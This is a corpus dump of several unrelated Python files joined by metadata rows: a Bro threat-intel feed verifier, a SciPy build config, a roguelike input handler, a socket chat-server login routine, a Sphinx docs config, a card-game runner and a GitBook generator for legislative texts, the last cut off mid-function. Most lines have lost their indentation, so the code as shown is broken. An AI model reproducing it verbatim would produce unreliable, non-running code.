elif len(t) > 1 and self.__verify_chars(t):
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def verify_meta_source(self, t):
ret = (bro_intel_indicator_return.WARNING, 'Invalid source - %s' % (t))
if self.__is_ignore_field(t):
ret = (bro_intel_indicator_return.OKAY, None)
elif len(t) > 1 and self.__verify_chars(t):
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def verify_meta_url(self, t):
ret = (bro_intel_indicator_return.WARNING, 'Invalid url - %s' % (t))
if self.__is_ignore_field(t):
ret = (bro_intel_indicator_return.OKAY, None)
elif len(t) > 1 and self.__verify_chars(t):
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def verify_meta_whitelist(self, t):
ret = (bro_intel_indicator_return.OKAY, 'Invalid whitelist - %s' % (t))
if self.__is_ignore_field(t):
ret = (bro_intel_indicator_return.OKAY, None)
elif len(t) > 1 and self.__verify_chars(t):
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def verify_meta_severity(self, t):
ret = (bro_intel_indicator_return.ERROR, 'Invalid severity - %s (valid: 1-10)' % (t))
try:
t_int = int(t)
            if isinstance(t_int, (int, long)) and (1 <= t_int <= 10):
ret = (bro_intel_indicator_return.OKAY, None)
except ValueError:
ret = (bro_intel_indicator_return.ERROR, 'Invalid severity - %s (valid: 1-10)' % (t))
return ret
def verify_meta_cif_severity(self, t):
VALID_SEVERITY = ['-', 'low', 'medium', 'med', 'high']
ret = (bro_intel_indicator_return.ERROR, 'Invalid cif_severity - %s (valid: %s)' % (t, ','.join(VALID_SEVERITY)))
if t in VALID_SEVERITY:
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def verify_meta_cif_impact(self, t):
ret = (bro_intel_indicator_return.WARNING, 'Invalid cif_impact - %s' % (t))
if self.__is_ignore_field(t):
ret = (bro_intel_indicator_return.OKAY, None)
elif len(t) > 1 and self.__verify_chars(t):
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def default(self, t):
ret = (bro_intel_indicator_return.WARNING, 'Invalid - %s' % (t))
write_stderr("Running default handler for: %s" % (t))
if self.__is_ignore_field(t):
ret = (bro_intel_indicator_return.OKAY, None)
elif len(t) > 1 and self.__verify_chars(t):
ret = (bro_intel_indicator_return.OKAY, None)
return ret
###############################################################################
# class bro_intel_feed_verifier
#
# This is the control class for Bro Intel Feed verification
#
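# A minimal valid feed, for reference (columns are tab-separated; illustrative):
#
#   #fields<TAB>indicator<TAB>indicator_type<TAB>meta.source
#   1.2.3.4<TAB>Intel::ADDR<TAB>example_feed
#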
class bro_intel_feed_verifier:
stock_required_fields = ['indicator',
'indicator_type',
'meta.source']
psled_required_fields = ['indicator',
'indicator_type',
'meta.source',
'meta.desc']
field_header_designator = '#fields'
feed_rx = r'([\S]+)'
feed_sep_rx = r'(\t)+'
header_fields = []
def __init__(self, options):
self.feed_file = options.feed_file
self.psled = options.psled
self.__feed_header_found = False
self.__num_of_fields = 0
self.required_fields = bro_intel_feed_verifier.stock_required_fields
self.warn_only = options.warn_only
if self.psled is not None:
self.required_fields = bro_intel_feed_verifier.psled_required_fields
def __make_one_indexed(self, l):
return map(lambda x: x+1, l)
def __is_start_of_feed(self, l):
ret = False
if len(l) >= 2:
if l[0] == self.field_header_designator:
ret = True
return ret
def __are_header_fields_valid(self, l):
ret = False
_fields_found = []
if l[0] == self.field_header_designator:
for index, item in enumerate(l):
if index == 0:
continue
if item in self.required_fields:
_fields_found.append(item)
self.header_fields.append(item)
t_list_diff = list(set(self.required_fields) - set(_fields_found))
if len(t_list_diff) == 0:
ret = True
else:
warning_line(0, 'Fields missing: %s' % (','.join(t_list_diff)))
return ret
def __count_fields(self, l):
return (len(l) - 1)
##
# <0 - Too few fields
# 0 - Proper field count
# >0 - Too many fields
##
def __verify_field_count(self, l):
return (len(l) - self.__num_of_fields)
def __verify_non_space(self, offset, l):
ret = True
r = [i for i, x in enumerate(l) if x == ' ']
if len(r) > 0:
warning_line(offset, 'Invalid empty field, offset %s' % (self.__make_one_indexed(r)))
ret = False
return ret
def __get_field_contents(self, l):
return l.split('\t')
def __verify_field_sep(self, offset, l, is_header=False):
ret = True
field_seps = re.findall(self.feed_sep_rx, l, re.IGNORECASE)
__field_total = self.__num_of_fields
if is_header:
__field_total += 1
if len(field_seps) >= __field_total:
warning_line(offset, 'Excess field separators found')
ret = False
for index, item in enumerate(field_seps):
for s in item:
if s != '\t':
warning_line(offset, 'Field separator incorrect in field offset %d' % (self.__make_one_indexed(index)))
ret = False
return ret
def __verify_header(self, index, l):
ret = False
contents = self.__get_field_contents(l)
if self.__is_start_of_feed(contents) and self.__are_header_fields_valid(contents):
if not self.__feed_header_found:
self.__num_of_fields = self.__count_fields(contents)
if self.__verify_field_sep(index, l, is_header=True):
ret = True
self.__feed_header_found = True
else:
write_stderr("Invalid field separator found in header. Must be a tab.")
else:
warning_line(index, "Duplicate header found")
return ret
def __verify_fields(self, index, content):
ret = (bro_intel_indicator_return.OKAY, None)
reason = ''
_fields_to_process = {}
validator = bro_data_intel_field_values()
#
# Not thrilled about this, but we need it to pull out correlatable fields
# since, order of the actual feed fields aren't guaranteed. Ugly for now,
# but workable and can likely be optimized shortly.
#
for content_index, t in enumerate(content):
_fields_to_process[self.header_fields[content_index]] = t
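        # e.g. header ['indicator', 'indicator_type', 'meta.source'] and row
        # ['1.2.3.4', 'Intel::ADDR', 'example_feed'] yield
        # {'indicator': '1.2.3.4', 'indicator_type': 'Intel::ADDR', 'meta.source': 'example_feed'}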
for k in _fields_to_process:
ret = validator.get_verifier(k)(_fields_to_process[k])
if len(ret) > 0 and ret[0] != bro_intel_indicator_return.OKAY:
if all(ord(l) > 31 and ord(l) < 127 and l in string.printable for l in k):
t_line = str(_fields_to_process[k])
t_line = hex_escape(t_line)
warning_line(index, 'Invalid entry \"%s\" for column \"%s\"' % (str(t_line), str(k)))
else:
warning_line(index, 'Unprintable character found for column \"%s\"' % (str(k)))
break
        if ret[0] == bro_intel_indicator_return.OKAY:
# Special case to verify indicator with indicator_type
c = validator.correlate_indictor_and_indicator_type(_fields_to_process['indicator'],
_fields_to_process['indicator_type'])
if c is not None:
if c[0] == bro_intel_indicator_return.WARNING:
warning_line(index, 'Indicator type \"%s\" possible issue with indicator: \"%s\"' % (_fields_to_process['indicator_type'], _fields_to_process['indicator']))
elif c[0] == bro_intel_indicator_return.ERROR:
error_line(index, 'Indicator type \"%s\" possible issue with indicator: \"%s\"' % (_fields_to_process['indicator_type'], _fields_to_process['indicator']))
ret = c
return ret
def __verify_entry(self, index, l):
ret = (bro_intel_indicator_return.ERROR, '')
contents = self.__get_field_contents(l)
_content_field_count = self.__verify_field_count(contents)
_warn_str = None
if _content_field_count == 0:
if self.__verify_field_sep(index, l) and self.__verify_non_space(index, contents):
ret = self.__verify_fields(index, contents)
elif _content_field_count > 0:
ret = (bro_intel_indicator_return.ERROR, 'Invalid number of fields - Found: %d, Header Fields: %d - Look for: EXTRA fields or tab seperators' % (len(contents), self.__num_of_fields))
elif _content_field_count < 0:
ret = (bro_intel_indicator_return.ERROR, 'Invalid number of fields - Found: %d, Header Fields: %d - Look for: EMPTY fields' % (len(contents), self.__num_of_fields))
return ret
def __load_feed(self, feed):
with open(feed) as f:
for line in f:
t_line = line.rstrip('\r\n')
if len(t_line):
yield t_line
def __handle_reporting(self, index, c):
if c is not None:
if c[0] == bro_intel_indicator_return.ERROR:
error_line(index, 'Details - %s' % (c[1]))
elif c[0] == bro_intel_indicator_return.WARNING:
warning_line(index, c[1])
def verify(self):
for index, l in enumerate(self.__load_feed(self.feed_file)):
# Check the header
if index == 0:
if not self.__verify_header(index, l):
error_line(index, "Invalid header")
sys.exit(2)
else:
t_ret = self.__verify_entry(index, l)
if t_ret[0] != bro_intel_indicator_return.OKAY:
self.__handle_reporting(index, t_ret)
if t_ret[0] == bro_intel_indicator_return.ERROR and self.warn_only is None:
sys.exit(3)
###############################################################################
# main()
###############################################################################
def main():
parser = OptionParser()
parser.add_option('-f', '--file', dest='feed_file', help='Bro Intel Feed to Verify')
parser.add_option('--psled', action='store_true', dest='psled', help='Verify Intel meets PacketSled requirements')
parser.add_option('--warn-only', action='store_true', dest='warn_only', help='Warn ONLY on errors, continue processing and report')
(options, args) = parser.parse_args()
if len(sys.argv) < 2:
parser.print_help()
sys.exit(1)
bifv = bro_intel_feed_verifier(options)
bifv.verify()
###############################################################################
# __name__ checking
###############################################################################
if __name__ == '__main__':
main()
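# Usage sketch (the script filename is hypothetical; the flags are the ones
# parsed above). Exit status: 1 = usage error, 2 = invalid header, 3 = first
# data error unless --warn-only keeps the run going:
#   python bro_intel_feed_verifier.py -f my_feed.dat --warn-only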
| gpl-3.0 | 3,333,144,674,259,233,000 | 40.403785 | 194 | 0.523048 | false | 3.75 | false | false | false |
Pymatteo/QtNMR | build/exe.win32-3.4/scipy/__config__.py | 1 | 1547 | # This file is generated by C:\Users\asd\src\34\scipy-0.15.1\setup.py
# It contains system_info results at the time of building this package.
__all__ = ["get_info","show"]
atlas_threads_info={}
openblas_info={}
lapack_mkl_info={}
blas_mkl_info={}
lapack_opt_info={'library_dirs': ['C:\\local\\vendor\\binaries\\sse3'], 'libraries': ['lapack', 'f77blas', 'cblas', 'atlas'], 'define_macros': [('NO_ATLAS_INFO', -1)], 'language': 'f77'}
atlas_blas_threads_info={}
blas_opt_info={'library_dirs': ['C:\\local\\vendor\\binaries\\sse3'], 'libraries': ['f77blas', 'cblas', 'atlas'], 'define_macros': [('NO_ATLAS_INFO', -1)], 'language': 'c'}
atlas_info={'library_dirs': ['C:\\local\\vendor\\binaries\\sse3'], 'libraries': ['lapack', 'f77blas', 'cblas', 'atlas'], 'define_macros': [('NO_ATLAS_INFO', -1)], 'language': 'f77'}
atlas_blas_info={'library_dirs': ['C:\\local\\vendor\\binaries\\sse3'], 'libraries': ['f77blas', 'cblas', 'atlas'], 'define_macros': [('NO_ATLAS_INFO', -1)], 'language': 'c'}
mkl_info={}
def get_info(name):
g = globals()
return g.get(name, g.get(name + "_info", {}))
def show():
for name,info_dict in globals().items():
if name[0] == "_" or type(info_dict) is not type({}): continue
print(name + ":")
if not info_dict:
print(" NOT AVAILABLE")
for k,v in info_dict.items():
v = str(v)
if k == "sources" and len(v) > 200:
v = v[:60] + " ...\n... " + v[-60:]
print(" %s = %s" % (k,v))
| gpl-3.0 | 3,856,228,979,932,694,000 | 47.967742 | 186 | 0.557207 | false | 2.941065 | false | false | false |
Kromey/roglick | roglick/systems/input.py | 1 | 3339 | import time
from roglick.lib import libtcod
from roglick.engine.ecs import SystemBase
from roglick.components import FatigueComponent,PositionComponent
from roglick.events import ClimbDownEvent,ClimbUpEvent,MoveEvent,QuitEvent,PreInputEvent
from roglick.engine import event
class InputSystem(SystemBase):
# Define movement keys with corresponding (dx,dy) tuples
MOVEMENT_KEYS = {
libtcod.KEY_KP1: (-1,1),
libtcod.KEY_KP2: (0,1),
libtcod.KEY_KP3: (1,1),
libtcod.KEY_KP4: (-1,0),
libtcod.KEY_KP6: (1,0),
libtcod.KEY_KP7: (-1,-1),
libtcod.KEY_KP8: (0, -1),
libtcod.KEY_KP9: (1,-1),
'y': (-1,-1),
'u': (1,-1),
'h': (-1,0),
'j': (0,1),
'k': (0,-1),
'l': (1,0),
'b': (-1,1),
'n': (1,1),
}
def execute(self):
"""Wait for player input, dispatching appropriate events."""
pc = self._entity_manager.pc
pc_fatigue = self._entity_manager.get_component(pc, FatigueComponent)
if pc_fatigue.fatigue > 0:
# PC's still fatigued, need to wait until they can act
return
event.dispatch(PreInputEvent())
key = self.get_keypress()
if key == libtcod.KEY_ESCAPE or libtcod.console_is_window_closed():
event.dispatch(QuitEvent()) #exit game
# Movement keys
if key in self.MOVEMENT_KEYS:
event.dispatch(MoveEvent(pc, *self.MOVEMENT_KEYS[key]))
elif key == '>':
event.dispatch(ClimbDownEvent(pc))
elif key == '<':
event.dispatch(ClimbUpEvent(pc))
def get_keypress(self):
"""Wrapper method for retrieving keypress events from the keyboard
A bug(?) in libtcod means that the wait_for_keypress function actually
returns key press AND release events, resulting in each tap of a key
functioning as two "keypress" events. To work around this, we wait for
a key and then test if it is actually in the 'pressed' state and, if
not, wait again.
This wrapper also checks for printable keys and translates key.c into
the corresponding character.
"""
while True:
key = libtcod.console_wait_for_keypress(True)
#if not key.pressed and key.vk != libtcod.KEY_NONE:
# # Make sure we actually get a pressed key
# return self.get_keypress()
if key.vk == libtcod.KEY_SHIFT or key.vk == libtcod.KEY_CONTROL:
# We don't care about these keys, just ignore them
continue
if key.pressed:
if key.vk == libtcod.KEY_F12:
# Take a screenshot, pause briefly, then resume waiting
libtcod.sys_save_screenshot()
time.sleep(0.5)
elif key.vk == libtcod.KEY_CHAR:
                    # Translate key.c into its character representation
return chr(key.c)
else:
# Return the key code
return key.vk
elif key.vk == libtcod.KEY_NONE:
# Ensure non-key events (e.g. closing the window) can propagate
return None
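# Usage sketch (the ECS wiring is an assumption -- SystemBase is expected to
# attach the entity manager before the game loop calls execute()):
#   input_system = InputSystem()
#   input_system.execute()  # returns early while the PC is fatigued, else
#                           # blocks on a keypress and dispatches Move/Climb/Quit events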
| mit | 4,605,689,450,673,225,000 | 35.293478 | 88 | 0.556155 | false | 3.777149 | false | false | false |
fansubgroup/Kerrigan1.x-server | ServerClone.py | 1 | 2507 | #!/usr/bin/env python
from multiprocessing import Process, Queue
from multiprocessing.reduction import reduce_handle, rebuild_handle
import os
import socket
import time
import threading
import json
import Skateboard
def server(s_to_client, PASSWD, addrnew, process_id, client_pipe):
print('ServerClone is ok.')
data = s_to_client.recv(4096)
SERVERINFO = '@Author: East Evil\nDefault Message From Server\nAnd You Can Change This Information By Youself'
if data:
#print data
fuck_json_0 = json.dumps(['', "%s\nPlease enter passwd:" % SERVERINFO])
s_to_client.sendall(fuck_json_0)
data_0 = s_to_client.recv(4096)
if data_0 == PASSWD:
            fuck_json_x = json.dumps(['', 'Access granted, logging in to the server...\nEnter a name to show your friends'])
s_to_client.sendall(fuck_json_x)
name_once = s_to_client.recv(4096)
# message to staff [0] is command
message_to_ec = ['UPDATE CLIENT SOCKET']
# message to staff [1] is socket owner name
message_to_ec.append(name_once)
# message to staff [2] is socket
s_to_client_reduction = reduce_handle(s_to_client.fileno())
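            # reduce_handle() serializes the socket's OS-level handle so the
            # staff process can rebuild the same connection via rebuild_handle()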
message_to_ec.append(s_to_client_reduction)
# messaget to staff [3] is socket to recveive result from staff
message_to_ec.append(process_id)
# 0 1 2 3
# message send to ec [command, name, client_socket, process_id]
# put into pipe
client_pipe.send(message_to_ec)
            fuck_json = json.dumps(['Server Room', 'Ok, server got your name [%s]\nEntering the chat room...' % name_once])
s_to_client.sendall(fuck_json)
Skateboard.smooth(s_to_client, client_pipe, name_once, process_id)
else:
print 'Error password'
        log_file = open('temp/log-server.log', 'a')
t_0 = time.localtime()
now_time_0 = "%d-%d-%d-%d:%d:%d" % (t_0.tm_year, t_0.tm_mon, t_0.tm_mday, t_0.tm_hour, t_0.tm_min, t_0.tm_sec)
log_file.writelines("ip:%s, port:%s failed to login at %s\n" % (addrnew[0], addrnew[1], now_time_0))
log_file.close()
err_json = json.dumps(['Error Password', 'Have no permission to enter the server'])
s_to_client.sendall(err_json)
s_to_client.close()
| gpl-3.0 | -3,393,982,700,760,976,000 | 28.845238 | 122 | 0.583167 | false | 3.477115 | false | false | false |
basnijholt/holoviews | doc/conf.py | 1 | 2564 | # -*- coding: utf-8 -*-
from nbsite.shared_conf import *
# Declare information specific to this project.
project = u'HoloViews'
authors = u'PyViz developers'
copyright = u'2019 ' + authors
description = 'Stop plotting your data - annotate your data and let it visualize itself.'
import holoviews
version = release = holoviews.__version__
html_theme = 'sphinx_ioam_theme'
html_static_path += ['_static']
html_theme_options = {
'logo': 'logo.png',
'favicon': 'favicon.ico',
'custom_css': 'holoviews.css'
}
nbbuild_cell_timeout = 360
extensions += ['nbsite.gallery']
templates_path = ['_templates']
nbsite_gallery_conf = {
'backends': ['bokeh', 'matplotlib', 'plotly'],
'galleries': {},
'github_org': 'pyviz',
'github_project': 'holoviews'
}
if os.environ.get('HV_DOC_GALLERY') not in ('False', 'false', '0'):
nbsite_gallery_conf['galleries']['gallery'] = {
'title': 'Gallery',
'sections': [
{'path': 'apps', 'title': 'Applications', 'skip': True},
'demos'
]
}
if os.environ.get('HV_DOC_REF_GALLERY') not in ('False', 'false', '0'):
nbsite_gallery_conf['galleries']['reference'] = {
'title': 'Reference Gallery',
'path': 'reference',
'sections': [
'elements',
'containers',
'streams',
'apps'
]
}
MAIN_SITE = '//holoviews.org'
html_context.update({
'PROJECT': project,
'DESCRIPTION': description,
'AUTHOR': authors,
'VERSION': version,
'WEBSITE_SERVER': 'https:',
# Links
'LINKS': (
('Getting started', '/getting_started/index'),
('User Guide', '/user_guide/index'),
('Gallery', '/gallery/index'),
('Reference Gallery', '/reference/index'),
('API Docs', '/Reference_Manual/index'),
('FAQ', '/FAQ'),
('About', '/about')
),
# About Links
'ABOUT': (
        ('About', '/about.html'),
),
# Social links
'SOCIAL': (
('Gitter', '//gitter.im/pyviz/pyviz'),
('Twitter', '//twitter.com/holoviews'),
('Github', '//github.com/pyviz/holoviews'),
),
# Links for the docs sub navigation
'NAV': (
('Getting started', 'getting_started/index'),
('User Guide', 'user_guide/index'),
('Gallery', 'gallery/index'),
('Reference Gallery', 'reference/index'),
('Releases', 'releases'),
('API', 'Reference_Manual/index'),
('FAQ', 'FAQ')
),
'js_includes': html_context['js_includes']+['holoviews.js']
})
| bsd-3-clause | 7,038,576,219,516,057,000 | 26.276596 | 89 | 0.555772 | false | 3.418667 | false | false | false |
marxsk/nimmt6 | runner.py | 1 | 1381 | #!/usr/bin/python
""" Single-player game - Nimmt6 with two players and open cards """
import game, player, card
# 10.000 round / 5 seconds with Firstplayer
ROUNDS = 10000
def play():
""" Main function which defines set of games for comuter bots or single game vs human"""
bots = [ player.Firstplayer(), player.Randomplayer(), player.Minsumplayer(), player.Minimizenegative() ]
mainbot = player.Minimizenegative()
valuation = card.get_standard_value_of_card
# valuation = card.get_single_value_of_card
human = True
human = False
if not human:
for bot in bots:
score = 0
for round_number in range(ROUNDS):
game_instance = game.Nimmtgame(seed = round_number, valuation = valuation)
game_instance.add_player("bot: MAIN", mainbot)
game_instance.add_player("bot: SIDE", bot)
results = game_instance.start()
if results[0] < results[1]:
score += 1
elif results[1] < results[0]:
score -= 1
print "%s : %s = %s" % (mainbot, bot, score)
else:
game_instance = game.Nimmtgame(verbose = True, valuation = valuation)
game_instance.add_player("bot: MAIN", mainbot)
game_instance.add_player("Human", player.Humanplayer())
results = game_instance.start()
print results
if results[0] < results[1]:
print "Player A"
elif results[0] == results[1]:
print "Draw"
else:
print "Player B"
if __name__ == "__main__":
play() | apache-2.0 | -1,805,987,851,468,064,500 | 29.043478 | 105 | 0.673425 | false | 3.015284 | false | false | false |
Legilibre/SedLex | sedlex/CreateGitBookVisitor.py | 1 | 16946 | # -*- coding: utf-8 -*-
from duralex.AbstractVisitor import AbstractVisitor
from .AddCommitMessageVisitor import int_to_roman
from . import template
from . import diff
from duralex.alinea_parser import *
import duralex.tree as tree
from bs4 import BeautifulSoup
import jinja2
import os
import subprocess
import tempfile
from distutils.dir_util import copy_tree
class CreateGitBookVisitor(AbstractVisitor):
def __init__(self, args):
self.gitbook_dir = args.gitbook
self.tmp_dir = tempfile.mkdtemp()
self.formats = args.gitbook_format
super(CreateGitBookVisitor, self).__init__()
def write_file(self, filename, data):
f = open(self.tmp_dir + '/' + filename, 'w')
f.write(data.encode('utf-8'))
f.close()
def get_article_commit_title(self, node):
ancestors = get_node_ancestors(node)
messages = []
for ancestor in ancestors:
if 'type' not in ancestor:
continue;
if ancestor['type'] == tree.TYPE_BILL_ARTICLE:
messages.append('Article ' + str(ancestor['order']))
elif ancestor['type'] == tree.TYPE_AMENDMENT:
messages.append('Amendement ' + str(ancestor['id']))
elif ancestor['type'] == tree.TYPE_HEADER1:
messages.append(int_to_roman(ancestor['order']))
elif ancestor['type'] == tree.TYPE_HEADER2:
messages.append(unicode(ancestor['order']) + u'°')
elif ancestor['type'] == tree.TYPE_HEADER3:
messages.append(unicode(chr(ord('a') + ancestor['order'])) + u')')
return ', '.join(messages[::-1])
def get_article_commit_diff(self, edit, target_title, target_href):
if 'htmlDiff' in edit:
soup = BeautifulSoup(edit['htmlDiff'], "html5lib")
filename_div = soup.find('div', {'class': 'diff-filename'})
a_tag = soup.new_tag('a', href=target_href)
a_tag.string = target_title
filename_div.string = ''
filename_div.append(a_tag)
return unicode(soup.body.div)
elif 'diff' in edit:
process = subprocess.Popen(
'diff2html -i stdin -d word -o stdout --su hidden -s line',
shell=True,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE
)
out, err = process.communicate(input=edit['diff'].encode('utf-8') + '\n')
soup = BeautifulSoup(out, "html5lib")
return (str(list(soup.find_all('style'))[0]) + '\n\n'
+ unicode(soup.find('div', {'id': 'diff'})))
def get_commits(self, node):
edit_nodes = filter_nodes(node, lambda n: 'type' in n and n['type'] == tree.TYPE_EDIT)
commits = []
for edit_node in edit_nodes:
article_refs = filter_nodes(edit_node, lambda n: n['type'] == tree.TYPE_ARTICLE_REFERENCE)
# FIXME: amendment that targets a bill article and not a law/code article
if len(article_refs) == 0:
continue
article_ref = article_refs[0]
target_title, target_href = self.get_deep_link(self.get_edit_target_nodes(article_ref))
commits.append({
'title': self.get_article_commit_title(edit_node),
# remove the " ({reference list})" from the commit message since its already printed
# in the header above
'description': re.sub(r' \(.*\)', '', edit_node['commitMessage'].splitlines()[0]) if 'commitMessage' in edit_node else None,
'diff': self.get_article_commit_diff(edit_node, target_title, target_href),
'target': {
'title': target_title,
'link': target_href
}
})
return commits
def get_articles(self, node):
articles = []
article_nodes = filter_nodes(node, lambda n: n['type'] == tree.TYPE_BILL_ARTICLE)
for article_node in article_nodes:
articles.append({
'order': article_node['order'],
'content': article_node['content'],
'commits': self.get_commits(article_node),
'githubIssue': article_node['githubIssue'] if 'githubIssue' in article_node else None,
'gitlabIssue': article_node['gitlabIssue'] if 'gitlabIssue' in article_node else None
})
return articles
def get_amendments(self, node):
amendments = []
amendment_nodes = filter_nodes(node, lambda n: n['type'] == tree.TYPE_AMENDMENT)
for amendment_node in amendment_nodes:
amendments.append({
'id': amendment_node['id'],
'content': amendment_node['content'],
'commits': self.get_commits(amendment_node),
'signatories': amendment_node['signatories'],
'description': amendment_node['description'],
})
return amendments
def merge_dicts(self, *dict_args):
"""
Given any number of dicts, shallow copy and merge into a new dict,
precedence goes to key value pairs in latter dicts.
"""
result = {}
for dictionary in dict_args:
result.update(dictionary)
return result
def visit_node(self, node):
super(CreateGitBookVisitor, self).visit_node(node)
if tree.is_root(node):
edits = self.build_edit_matrix(node)
articles = self.get_articles(node)
amendments = self.get_amendments(node)
modified_texts = self.get_modified_texts(edits)
template_data = {
'title': self.get_book_title(node),
'url': node['url'],
'type': node['type'],
'description': node['description'],
'modified': modified_texts,
'articles': articles,
'amendments': amendments,
'tree': node,
}
if 'cocoricoVote' in node:
template_data['cocorico_vote'] = node['cocoricoVote']
template.template_file(
'gitbook/book.json.j2',
template_data,
os.path.join(self.tmp_dir, 'book.json')
)
template.template_file(
'gitbook/styles/website.css.j2',
template_data,
os.path.join(self.tmp_dir, 'styles/website.css')
)
template.template_file(
'gitbook/SUMMARY.md.j2',
template_data,
os.path.join(self.tmp_dir, 'SUMMARY.md')
)
template.template_file(
'gitbook/README.md.j2',
template_data,
os.path.join(self.tmp_dir, 'README.md')
)
current_article = 0
for article in articles:
template.template_file(
'gitbook/article.md.j2',
self.merge_dicts(template_data, {'current_article': current_article}),
os.path.join(self.tmp_dir, 'article-' + str(article['order']) + '.md')
)
current_article += 1
current_amendment = 0
for amendment in amendments:
template.template_file(
'gitbook/amendment.md.j2',
self.merge_dicts(template_data, {'current_amendment': current_amendment}),
os.path.join(self.tmp_dir, 'amendment-' + str(amendment['id']) + '.md')
)
current_amendment += 1
current_article = 0
current_law = 0
for modified in modified_texts:
template.template_file(
'gitbook/law.md.j2',
self.merge_dicts(template_data, {
'current_law': current_law,
}),
os.path.join(self.tmp_dir, modified['law'] + '.md')
)
for article in modified['articles']:
template.template_file(
'gitbook/text.md.j2',
self.merge_dicts(template_data, {
'current_law': current_law,
'current_article': current_article
}),
os.path.join(self.tmp_dir, modified['law'] + '-' + article['id'] + '.md')
)
current_article += 1
current_law += 1
if 'html' in self.formats:
self.cmd('gitbook install')
self.cmd('gitbook build')
if 'markdown' in self.formats:
copy_tree(self.tmp_dir, self.gitbook_dir)
else:
copy_tree(os.path.join(self.tmp_dir, '_book'), self.gitbook_dir)
else:
copy_tree(self.tmp_dir, self.gitbook_dir)
def cmd(self, command):
process = subprocess.Popen(
command,
cwd=self.tmp_dir,
shell=True,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE
)
return process.communicate()
def get_book_title(self, root_node):
title = ''
if root_node['type'] == tree.TYPE_LAW_PROJECT:
title = 'Projet De Loi'
elif root_node['type'] == tree.TYPE_LAW_PROPOSAL:
title = 'Proposition De Loi'
if 'id' in root_node:
title += u' N°' + str(root_node['id'])
if 'legislature' in root_node:
title += ', ' + str(root_node['legislature']) + u'ème législature'
return title
def patch(self, original, unified_diff):
        fd, filename = tempfile.mkstemp()
        os.write(fd, original.encode('utf-8'))
        os.close(fd)
process = subprocess.Popen(
'patch -r - -p0 --output=- ' + filename,
shell=True,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE
)
out, err = process.communicate(input=unified_diff.encode('utf-8') + '\n')
return ''.join(out).decode('utf-8')
def get_deep_link(self, nodes):
href = []
title = []
for node in nodes:
if node['type'] == tree.TYPE_LAW_REFERENCE:
title.append(u'Loi N°' + node['id'])
href.append(node['id'])
elif node['type'] == tree.TYPE_BILL_ARTICLE:
title.append(u'Article ' + str(node['order']))
href.append(u'article-' + str(node['order']) + '.md#article-' + str(node['order']))
elif node['type'] == tree.TYPE_AMENDMENT:
title.append(u'Amendment ' + node['id'])
href.append(u'amendment-' + node['id'] + '.md#amendment-' + node['id'])
elif node['type'] == tree.TYPE_ARTICLE_REFERENCE:
title.append(u'Article ' + node['id'])
href.append(node['id'] + '.md')
elif node['type'] == tree.TYPE_HEADER1:
title.append(int_to_roman(node['order']))
href.append(int_to_roman(node['order']))
elif node['type'] == tree.TYPE_HEADER2:
title.append(unicode(node['order']) + u'°')
href.append(str(node['order']) + u'°')
            elif node['type'] == tree.TYPE_HEADER3:
                title.append(unicode(chr(ord('a') + node['order'])) + u')')
                href.append(unicode(chr(ord('a') + node['order'])) + u')')
return (', '.join(title), '-'.join(href))
def get_edit_target_nodes(self, node):
nodes = []
if tree.is_reference(node):
nodes.append(node)
nodes += filter(
lambda n: tree.is_reference(n),
get_node_ancestors(node)
)
return sorted(
nodes,
key=lambda n: tree.TYPE_REFERENCE.index(n['type'])
)
def get_edit_source_nodes(self, node):
edit_source_types = [
tree.TYPE_AMENDMENT,
tree.TYPE_BILL_ARTICLE,
tree.TYPE_HEADER1,
tree.TYPE_HEADER2,
tree.TYPE_HEADER3,
]
return sorted(
filter(
lambda n: 'type' in n and n['type'] in edit_source_types,
get_node_ancestors(node)
),
key=lambda n: edit_source_types.index(n['type'])
)
def get_original_content(self, ref):
if ref['type'] == tree.TYPE_BILL_ARTICLE_REFERENCE:
bill_article = tree.filter_nodes(
tree.get_root(ref),
lambda n: n['type'] == tree.TYPE_BILL_ARTICLE and n['order'] == ref['order']
)
if len(bill_article) == 1:
return bill_article[0]['content']
elif ref['type'] == tree.TYPE_ARTICLE_REFERENCE:
f = open(ref['filename'], 'r')
text = f.read().decode('utf-8')
f.close()
return text
def get_modified_texts(self, edits):
modified = []
edits = edits[tree.TYPE_BILL_ARTICLE]
law_ids = set([i[0] for i in edits.keys()])
for law_id in law_ids:
law_edits = {k: v for k, v in edits.iteritems() if k[0] == law_id}
articles = []
            for k, v in law_edits.iteritems():
law_ref = filter_nodes(v[0][-1], lambda n: n['type'] in [tree.TYPE_LAW_REFERENCE, tree.TYPE_CODE_REFERENCE] and n['id'] == k[0])[0]
article_ref = filter_nodes(law_ref, lambda n: n['type'] == tree.TYPE_ARTICLE_REFERENCE and n['id'] == k[1])[0]
original_text = self.get_original_content(article_ref)
text = original_text
commits = []
for edit_source in v:
title, href = self.get_deep_link(edit_source)
commits.append({'title': title, 'link': href})
edit_refs = filter_nodes(edit_source[-1], lambda n: n['type'] == tree.TYPE_EDIT)
for edit_ref in edit_refs:
if 'diff' in edit_ref:
text = self.patch(text, edit_ref['diff'])
article = {
'id': k[1],
'diff': diff.make_html_rich_diff(original_text, text),
'commits': commits
}
if 'gitlabHistory' in article_ref:
article['gitlabHistory'] = article_ref['gitlabHistory']
if 'githubHistory' in article_ref:
article['githubHistory'] = article_ref['githubHistory']
articles.append(article)
articles = sorted(articles, key=lambda x: x['id'].replace('-', ' '))
modified.append({'law': law_id, 'articles': articles})
return modified
def build_edit_matrix(self, node):
edits = {
tree.TYPE_BILL_ARTICLE: {},
tree.TYPE_AMENDMENT: {},
}
# fetch bill articles targeting law articles
self.build_edit_matrix_for_types(
node,
edits[tree.TYPE_BILL_ARTICLE],
[tree.TYPE_BILL_ARTICLE],
[tree.TYPE_ARTICLE_REFERENCE],
[tree.TYPE_LAW_REFERENCE, tree.TYPE_CODE_REFERENCE]
)
self.build_edit_matrix_for_types(
node,
edits[tree.TYPE_AMENDMENT],
[tree.TYPE_AMENDMENT],
[tree.TYPE_ARTICLE_REFERENCE],
[tree.TYPE_LAW_REFERENCE, tree.TYPE_CODE_REFERENCE]
)
# fetch amendments targeting bill articles
